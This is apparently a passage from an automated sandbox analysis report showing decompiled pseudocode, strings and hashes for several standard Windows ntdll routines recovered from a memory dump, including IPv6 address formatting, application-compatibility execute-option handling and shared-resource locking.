                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
                                                                                            • Instruction ID: 57eb72967a0576cc9f8e682aceb4822b20c24c5719fec0db515476544a9f3dfa
                                                                                            • Opcode Fuzzy Hash: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
                                                                                            • Instruction Fuzzy Hash: A0B09B719014D5C9D711D7745608717794077D0741F16C071E1020641A4778C495F5B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 009E7CC0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 198COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 41%
                                                                                            			E009E7CC0(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t60;
				signed int _t65;
				void* _t70;
				void* _t73;
				signed int _t86;
				void* _t92;
				signed int _t94;
				intOrPtr _t101;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t115;
				intOrPtr _t116;
				signed char _t117;
				void* _t118;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;

				_t101 = _a8;
				_t120 = _a4;
				_t121 = 0;
				_t104 = _t101 + 0x2e;
				_v24 = 8;
				_v16 = _t104;
				if( *_t120 == 0) {
					__eflags =  *(_t120 + 2);
					if( *(_t120 + 2) != 0) {
						goto L1;
					}
					__eflags =  *(_t120 + 4);
					if( *(_t120 + 4) != 0) {
						goto L1;
					}
					__eflags =  *(_t120 + 6);
					if( *(_t120 + 6) != 0) {
						goto L1;
					}
					_t117 =  *(_t120 + 0xc) & 0x0000ffff;
					_v20 = _t117 >> 8;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L1;
					}
					_t86 =  *(_t120 + 8) & 0x0000ffff;
					__eflags = _t86;
					if(_t86 != 0) {
						_v12 = 0xffff;
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L1;
						}
						__eflags =  *(_t120 + 0xa);
						if( *(_t120 + 0xa) != 0) {
							goto L1;
						}
						__eflags = _t104 - _t101;
						_push( *(_t120 + 0xf) & 0x000000ff);
						_push( *(_t120 + 0xe) & 0x000000ff);
						_push(_v20 & 0x000000ff);
						_t92 = E00A36B30(_t101, _t104 - _t101, "::ffff:0:%u.%u.%u.%u", _t117 & 0x000000ff);
						L29:
						return _t92 + _t101;
					}
					_t94 =  *(_t120 + 0xa) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 == 0) {
						_t118 = 0x9c48a4;
						L27:
						_push( *(_t120 + 0xf) & 0x000000ff);
						_push( *(_t120 + 0xe) & 0x000000ff);
						_push(_v20 & 0x000000ff);
						_push( *(_t120 + 0xc) & 0xff);
						_t92 = E00A36B30(_t101, _t104 - _t101, "::%hs%u.%u.%u.%u", _t118);
						goto L29;
					}
					__eflags = _t94 - 0xffff;
					if(_t94 != 0xffff) {
						goto L1;
					}
					_t118 = 0x9dd700;
					goto L27;
				}
				L1:
				_t105 = _t121;
				_t60 = _t121;
				_v8 = _t105;
				_v20 = _t60;
				if(( *(_t120 + 8) & 0x0000fffd) == 0) {
					__eflags =  *(_t120 + 0xa) - 0xfe5e;
					if( *(_t120 + 0xa) == 0xfe5e) {
						_v24 = 6;
					}
				}
				_t115 = _t121;
				_t102 = _t60;
				do {
					if( *((intOrPtr*)(_t120 + _t115 * 2)) == _t121) {
						__eflags = _t115 - _t60 + 1 - _v8 - _t102;
						_t60 = _v20;
						if(__eflags <= 0) {
							_t105 = _v8;
						} else {
							_t49 = _t115 + 1; // 0x1
							_t105 = _t49;
							_t102 = _t60;
							_v8 = _t105;
						}
					} else {
						_t13 = _t115 + 1; // 0x1
						_t60 = _t13;
						_v20 = _t60;
					}
					_t115 = _t115 + 1;
				} while (_t115 < _v24);
				_v12 = _t102;
				_t103 = _a8;
				if(_t105 - _t102 > 1) {
					_t65 = _v12;
				} else {
					_t105 = _t121;
					_t65 = _t121;
					_v8 = _t105;
					_v12 = _t65;
				}
				do {
					if(_t121 < _t105) {
						__eflags = _t65 - _t121;
						if(_t65 > _t121) {
							goto L9;
						}
						_push("::");
						_push(_v16 - _t103);
						_push(_t103);
						_t70 = E00A36B30();
						_t105 = _v8;
						_t122 = _t122 + 0xc;
						_t121 = _t105 - 1;
						goto L13;
					}
					L9:
					if(_t121 != 0 && _t121 != _t105) {
						_push(":");
						_push(_v16 - _t103);
						_push(_t103);
						_t73 = E00A36B30();
						_t122 = _t122 + 0xc;
						_t103 = _t103 + _t73;
					}
					_t70 = E00A36B30(_t103, _v16 - _t103, "%x",  *(_t120 + _t121 * 2) & 0x0000ffff);
					_t105 = _v8;
					_t122 = _t122 + 0x10;
					L13:
					_t116 = _v24;
					_t103 = _t103 + _t70;
					_t65 = _v12;
					_t121 = _t121 + 1;
				} while (_t121 < _t116);
				if(_t116 < 8) {
					_push( *(_t120 + 0xf) & 0x000000ff);
					_push( *(_t120 + 0xe) & 0x000000ff);
					_push( *(_t120 + 0xd) & 0x000000ff);
					_t103 = _t103 + E00A36B30(_t103, _v16 - _t103, ":%u.%u.%u.%u",  *(_t120 + 0xc) & 0x000000ff);
				}
				return _t103;
			}



























                                                                                            0x009e7cc9
                                                                                            0x009e7cce
                                                                                            0x009e7cd1
                                                                                            0x009e7cd3
                                                                                            0x009e7cd6
                                                                                            0x009e7cdd
                                                                                            0x009e7ce3
                                                                                            0x00a42bbb
                                                                                            0x00a42bbf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42bc5
                                                                                            0x00a42bc9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42bcf
                                                                                            0x00a42bd3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42bd9
                                                                                            0x00a42be2
                                                                                            0x00a42be5
                                                                                            0x00a42be8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42bee
                                                                                            0x00a42bf2
                                                                                            0x00a42bf5
                                                                                            0x00a42c74
                                                                                            0x00a42c7b
                                                                                            0x00a42c7f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42c85
                                                                                            0x00a42c89
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42c4b
                                                                                            0x00a42c4d
                                                                                            0x00a42c52
                                                                                            0x00a42c59
                                                                                            0x00a42c65
                                                                                            0x00a42c6d
                                                                                            0x00000000
                                                                                            0x00a42c6d
                                                                                            0x00a42bf7
                                                                                            0x00a42bfb
                                                                                            0x00a42bfe
                                                                                            0x00a42c15
                                                                                            0x00a42c1a
                                                                                            0x00a42c20
                                                                                            0x00a42c25
                                                                                            0x00a42c2c
                                                                                            0x00a42c34
                                                                                            0x00a42c3d
                                                                                            0x00000000
                                                                                            0x00a42c42
                                                                                            0x00a42c05
                                                                                            0x00a42c08
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42c0e
                                                                                            0x00000000
                                                                                            0x00a42c0e
                                                                                            0x009e7ce9
                                                                                            0x009e7cee
                                                                                            0x009e7cf0
                                                                                            0x009e7cf2
                                                                                            0x009e7cf5
                                                                                            0x009e7cfc
                                                                                            0x00a42c96
                                                                                            0x00a42c9a
                                                                                            0x00a42ca0
                                                                                            0x00a42ca0
                                                                                            0x00a42c9a
                                                                                            0x009e7d02
                                                                                            0x009e7d04
                                                                                            0x009e7d06
                                                                                            0x009e7d0a
                                                                                            0x00a42cb6
                                                                                            0x00a42cb8
                                                                                            0x00a42cbb
                                                                                            0x00a42cca
                                                                                            0x00a42cbd
                                                                                            0x00a42cbd
                                                                                            0x00a42cbd
                                                                                            0x00a42cc0
                                                                                            0x00a42cc2
                                                                                            0x00a42cc2
                                                                                            0x009e7d10
                                                                                            0x009e7d10
                                                                                            0x009e7d10
                                                                                            0x009e7d13
                                                                                            0x009e7d13
                                                                                            0x009e7d16
                                                                                            0x009e7d17
                                                                                            0x009e7d1e
                                                                                            0x009e7d23
                                                                                            0x009e7d29
                                                                                            0x009e7d9f
                                                                                            0x009e7d2b
                                                                                            0x009e7d2b
                                                                                            0x009e7d2d
                                                                                            0x009e7d2f
                                                                                            0x009e7d32
                                                                                            0x009e7d32
                                                                                            0x009e7d35
                                                                                            0x009e7d37
                                                                                            0x00a42cd2
                                                                                            0x00a42cd4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42cdd
                                                                                            0x00a42ce4
                                                                                            0x00a42ce5
                                                                                            0x00a42ce6
                                                                                            0x00a42ceb
                                                                                            0x00a42cee
                                                                                            0x00a42cf1
                                                                                            0x00000000
                                                                                            0x00a42cf1
                                                                                            0x009e7d3d
                                                                                            0x009e7d3f
                                                                                            0x009e7d48
                                                                                            0x009e7d4f
                                                                                            0x009e7d50
                                                                                            0x009e7d51
                                                                                            0x009e7d56
                                                                                            0x009e7d59
                                                                                            0x009e7d59
                                                                                            0x009e7d73
                                                                                            0x009e7d78
                                                                                            0x009e7d7b
                                                                                            0x009e7d7e
                                                                                            0x009e7d7e
                                                                                            0x009e7d81
                                                                                            0x009e7d83
                                                                                            0x009e7d86
                                                                                            0x009e7d87
                                                                                            0x009e7d8e
                                                                                            0x00a42cfd
                                                                                            0x00a42d02
                                                                                            0x00a42d07
                                                                                            0x00a42d21
                                                                                            0x00a42d21
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: 3bdc1e842b8540c86782cee92ecbb86820db7ded6ac8e4206b2b6710f23806ef
                                                                                            • Instruction ID: b85e128fd250ff274b36b7e2b1573038ac5ecf6ee9618440de7694df97b9d404
                                                                                            • Opcode Fuzzy Hash: 3bdc1e842b8540c86782cee92ecbb86820db7ded6ac8e4206b2b6710f23806ef
                                                                                            • Instruction Fuzzy Hash: 7A61D3B5A04156BBCB11DF998D80A7EF7B8FF48300B60826AF894D7681D374DE5097A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 009E40FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 63%
                                                                                            			E009E40FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0xadd360 ^ _t107;
				_v8 =  *0xadd360 ^ _t107;
				_t105 = __ecx;
				if( *0xad84d4 == 0) {
					L5:
					return E00A2B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E009FE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E009E42EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E009E41EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E00A296C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E009E429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E00A75720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E00A2FA60( &_v548, 0, 0x214);
						_t106 =  *0xad84d4;
						_t110 = _t108 + 0x20;
						 *0xadb1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0xad84d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E00A2B75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E00A75720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E00A31480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E00A75720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E00A31150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E00A75720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E00A63E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E00A75720();
						goto L15;
					}
					L8:
					_t56 = E009E41F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                            0x009e410d
                                                                                            0x009e410f
                                                                                            0x009e411c
                                                                                            0x009e411e
                                                                                            0x009e4158
                                                                                            0x009e4168
                                                                                            0x009e4168
                                                                                            0x009e4126
                                                                                            0x009e4130
                                                                                            0x009e413c
                                                                                            0x00a404a2
                                                                                            0x009e4142
                                                                                            0x009e414b
                                                                                            0x009e414b
                                                                                            0x009e414f
                                                                                            0x009e416b
                                                                                            0x009e4171
                                                                                            0x009e4176
                                                                                            0x009e4178
                                                                                            0x009e41d0
                                                                                            0x009e41d2
                                                                                            0x009e41d3
                                                                                            0x009e41a7
                                                                                            0x009e41ae
                                                                                            0x009e41b0
                                                                                            0x009e41db
                                                                                            0x009e41b2
                                                                                            0x009e41b8
                                                                                            0x009e41bf
                                                                                            0x009e41c1
                                                                                            0x009e41c1
                                                                                            0x009e41c1
                                                                                            0x009e41c3
                                                                                            0x009e41c5
                                                                                            0x009e41df
                                                                                            0x009e41e2
                                                                                            0x009e41e2
                                                                                            0x009e41c7
                                                                                            0x009e41c9
                                                                                            0x00a40628
                                                                                            0x00a40628
                                                                                            0x00a40630
                                                                                            0x00a40631
                                                                                            0x00a40633
                                                                                            0x00a40635
                                                                                            0x00a40635
                                                                                            0x00000000
                                                                                            0x009e41c9
                                                                                            0x009e417d
                                                                                            0x009e4183
                                                                                            0x009e4189
                                                                                            0x009e418e
                                                                                            0x009e4190
                                                                                            0x00a404a9
                                                                                            0x00a404af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a404b5
                                                                                            0x00a404c8
                                                                                            0x00a404d5
                                                                                            0x00a404e5
                                                                                            0x00a404ea
                                                                                            0x00a404f6
                                                                                            0x00a40518
                                                                                            0x00a4051e
                                                                                            0x00a40520
                                                                                            0x00a40522
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a40528
                                                                                            0x00a4052e
                                                                                            0x00a40530
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a4053b
                                                                                            0x00a4053d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a40545
                                                                                            0x00a4054c
                                                                                            0x00a4054e
                                                                                            0x00a40623
                                                                                            0x00000000
                                                                                            0x00a40623
                                                                                            0x00a40556
                                                                                            0x00a40557
                                                                                            0x00a4056f
                                                                                            0x00a40574
                                                                                            0x00a40583
                                                                                            0x00a4058a
                                                                                            0x00a4058b
                                                                                            0x00a4058d
                                                                                            0x00a405b5
                                                                                            0x00a405c0
                                                                                            0x00a405c6
                                                                                            0x00a405c8
                                                                                            0x00a405cb
                                                                                            0x00a405cd
                                                                                            0x00a405d3
                                                                                            0x00a405d5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a405db
                                                                                            0x00a405db
                                                                                            0x00a405e3
                                                                                            0x00a405e7
                                                                                            0x00a405e9
                                                                                            0x00a405eb
                                                                                            0x00a405ed
                                                                                            0x00a405ed
                                                                                            0x00a405fa
                                                                                            0x00a405ff
                                                                                            0x00a40606
                                                                                            0x00a4060b
                                                                                            0x00a4060d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a40613
                                                                                            0x00a40613
                                                                                            0x00a40616
                                                                                            0x00a40616
                                                                                            0x00000000
                                                                                            0x00a4061e
                                                                                            0x00a4058f
                                                                                            0x00a40594
                                                                                            0x00a40596
                                                                                            0x00a40598
                                                                                            0x00000000
                                                                                            0x00a4059d
                                                                                            0x009e4196
                                                                                            0x009e4198
                                                                                            0x009e419d
                                                                                            0x009e419f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x009e41a1
                                                                                            0x00000000
                                                                                            0x009e4151
                                                                                            0x009e4151
                                                                                            0x009e4151
                                                                                            0x00000000
                                                                                            0x009e4151

                                                                                            Strings
                                                                                            • Execute=1, xrefs: 00A4057D
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A405AC
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A40566
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A4058F
                                                                                            • ExecuteOptions, xrefs: 00A4050A
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A405F1
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A404BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            • Opcode ID: 372e9cb38d825702bc76321cd0886f4d8b21b8a1f6b1fdfce3e9e257109fafcb
                                                                                            • Instruction ID: d94d2ad7d57da9499d7b033d26a97cf60c2807a332dc2e7cd82de0c4e53af79c
                                                                                            • Opcode Fuzzy Hash: 372e9cb38d825702bc76321cd0886f4d8b21b8a1f6b1fdfce3e9e257109fafcb
                                                                                            • Instruction Fuzzy Hash: 3F616E71A002597BDF11DBA5ED86FE977BCEFA4305F0400A9F609A7181DB709E818F61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 009E77A0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 60%
                                                                                            			E009E77A0(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t16;
				char _t17;
				char _t21;
				void* _t23;
				char _t28;
				intOrPtr* _t30;
				char _t32;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t39;
				char _t42;
				signed int _t49;
				signed int _t50;
				void* _t51;

				_t37 = __edx;
				_t50 = _t49 & 0xfffffff8;
				_push(__ecx);
				_t39 = _a4;
				_t30 = _t39 + 0x28;
				_t42 =  *_t30;
				if(_t42 < 0) {
					_t34 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t39 + 0x2c)) -  *((intOrPtr*)(_t34 + 0x24));
					if( *((intOrPtr*)(_t39 + 0x2c)) !=  *((intOrPtr*)(_t34 + 0x24))) {
						while(1) {
							L7:
							__eflags = _t42;
							if(_t42 >= 0) {
								goto L1;
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L19:
								_t17 = 0;
								L3:
								return _t17;
							}
							_t18 =  *((intOrPtr*)(_t39 + 0x34));
							_t36 = _t39 + 0x1c;
							 *((intOrPtr*)(_t18 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 0x34)) + 0x14)) + 1;
							asm("lock inc dword [ecx]");
							_t42 =  *_t30;
							__eflags = _t42;
							if(_t42 < 0) {
								L11:
								_t32 = 0;
								__eflags = 0;
								while(1) {
									asm("sbb esi, esi");
									_t47 =  !( ~( *(_t39 + 0x30) & 1)) & 0x00ad79c8;
									_push( !( ~( *(_t39 + 0x30) & 1)) & 0x00ad79c8);
									_push(0);
									_push( *((intOrPtr*)(_t39 + 0x18)));
									_t21 = E00A29520();
									__eflags = _t21 - 0x102;
									if(_t21 != 0x102) {
										break;
									}
									_t23 = E00A2CE00( *_t47,  *((intOrPtr*)(_t47 + 4)), 0xff676980, 0xffffffff);
									_push(_t37);
									_push(_t23);
									E00A75720(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t32);
									E00A75720(0x65, 0, "RTL: Resource at %p\n", _t39);
									_t51 = _t50 + 0x28;
									_t32 = _t32 + 1;
									__eflags = _t32 - 2;
									if(__eflags > 0) {
										_t36 = _t39;
										E00A7FFB9(_t32, _t39, _t37, _t39, 0, __eflags);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A75720();
									_t50 = _t51 + 0xc;
								}
								_t30 = _t39 + 0x28;
								__eflags = _t21;
								if(_t21 < 0) {
									L00A3DF30(_t36, _t37, _t21);
									goto L19;
								}
								_t42 =  *_t30;
								continue;
							}
							_t28 = E00A247E7(_t36);
							__eflags = _t28;
							if(_t28 != 0) {
								continue;
							}
							goto L11;
						}
						goto L1;
					}
					asm("lock dec dword [ebx]");
					L2:
					_t17 = 1;
					goto L3;
				}
				L1:
				_t16 = _t42;
				asm("lock cmpxchg [ebx], ecx");
				if(_t16 != _t42) {
					_t42 = _t16;
					goto L7;
				}
				goto L2;
			}





















                                                                                            0x009e77a0
                                                                                            0x009e77a5
                                                                                            0x009e77a8
                                                                                            0x009e77ac
                                                                                            0x009e77af
                                                                                            0x009e77b2
                                                                                            0x009e77b6
                                                                                            0x009e77d4
                                                                                            0x009e77de
                                                                                            0x009e77e1
                                                                                            0x00a428f2
                                                                                            0x00a428f2
                                                                                            0x00a428f2
                                                                                            0x00a428f4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a428fa
                                                                                            0x00a428fe
                                                                                            0x00a429ae
                                                                                            0x00a429ae
                                                                                            0x009e77cb
                                                                                            0x009e77d1
                                                                                            0x009e77d1
                                                                                            0x00a42904
                                                                                            0x00a42907
                                                                                            0x00a4290a
                                                                                            0x00a4290d
                                                                                            0x00a42910
                                                                                            0x00a42912
                                                                                            0x00a42914
                                                                                            0x00a4291f
                                                                                            0x00a4291f
                                                                                            0x00a4291f
                                                                                            0x00a42921
                                                                                            0x00a4292b
                                                                                            0x00a4292f
                                                                                            0x00a42935
                                                                                            0x00a42936
                                                                                            0x00a42938
                                                                                            0x00a4293b
                                                                                            0x00a42940
                                                                                            0x00a42945
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a42953
                                                                                            0x00a42958
                                                                                            0x00a42959
                                                                                            0x00a42965
                                                                                            0x00a42973
                                                                                            0x00a42978
                                                                                            0x00a4297b
                                                                                            0x00a4297c
                                                                                            0x00a4297f
                                                                                            0x00a42981
                                                                                            0x00a42983
                                                                                            0x00a42983
                                                                                            0x00a42988
                                                                                            0x00a4298d
                                                                                            0x00a4298e
                                                                                            0x00a42990
                                                                                            0x00a42995
                                                                                            0x00a42995
                                                                                            0x00a4299a
                                                                                            0x00a4299d
                                                                                            0x00a4299f
                                                                                            0x00a429a9
                                                                                            0x00000000
                                                                                            0x00a429a9
                                                                                            0x00a429a1
                                                                                            0x00000000
                                                                                            0x00a429a1
                                                                                            0x00a42916
                                                                                            0x00a4291b
                                                                                            0x00a4291d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00a4291d
                                                                                            0x00000000
                                                                                            0x00a428f2
                                                                                            0x009e77e7
                                                                                            0x009e77c9
                                                                                            0x009e77c9
                                                                                            0x00000000
                                                                                            0x009e77c9
                                                                                            0x009e77b8
                                                                                            0x009e77bb
                                                                                            0x009e77bd
                                                                                            0x009e77c3
                                                                                            0x00a428f0
                                                                                            0x00000000
                                                                                            0x00a428f0
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A42953
                                                                                            Strings
                                                                                            • RTL: Re-Waiting, xrefs: 00A42988
                                                                                            • RTL: Resource at %p, xrefs: 00A4296B
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A4295B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.754458424.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            • Opcode ID: 3279be35f955261c0afb2875bd96d32b983373f1f2d63b8ea39f4f76fa3a612e
                                                                                            • Instruction ID: 0c8f74f7a6d7588daf778c7c43655cc710d568ea3ea8fbce2c335223b2db2614
                                                                                            • Opcode Fuzzy Hash: 3279be35f955261c0afb2875bd96d32b983373f1f2d63b8ea39f4f76fa3a612e
                                                                                            • Instruction Fuzzy Hash: 49318A35A00631BBCB218B26CC81F6BBB64EF95B20F504214FD486B682CB22FC11C7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A21CC7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E00A21CC7(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t91;
				intOrPtr _t95;
				short _t96;
				intOrPtr _t104;
				intOrPtr _t111;
				short _t119;
				signed int _t131;
				intOrPtr _t134;
				intOrPtr _t138;
				intOrPtr* _t144;
				intOrPtr* _t147;
				intOrPtr* _t149;
				void* _t151;

				_t139 = __edx;
				_push(0x154);
				_push(0xac0348);
				E00A3D0E8(__ebx, __edi, __esi);
				 *(_t151 - 0xf0) = __edx;
				_t147 = __ecx;
				 *((intOrPtr*)(_t151 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t151 - 0xf8)) =  *((intOrPtr*)(_t151 + 8));
				 *((intOrPtr*)(_t151 - 0xe8)) =  *((intOrPtr*)(_t151 + 0xc));
				 *((intOrPtr*)(_t151 - 0xf4)) =  *((intOrPtr*)(_t151 + 0x10));
				 *((intOrPtr*)(_t151 - 0xe4)) = 0;
				 *((intOrPtr*)(_t151 - 0xdc)) = 0;
				 *((intOrPtr*)(_t151 - 0xd8)) = 0;
				 *(_t151 - 0xe0) = 0;
				 *((intOrPtr*)(_t151 - 0x140)) = 0x40;
				E00A2FA60(_t151 - 0x13c, 0, 0x3c);
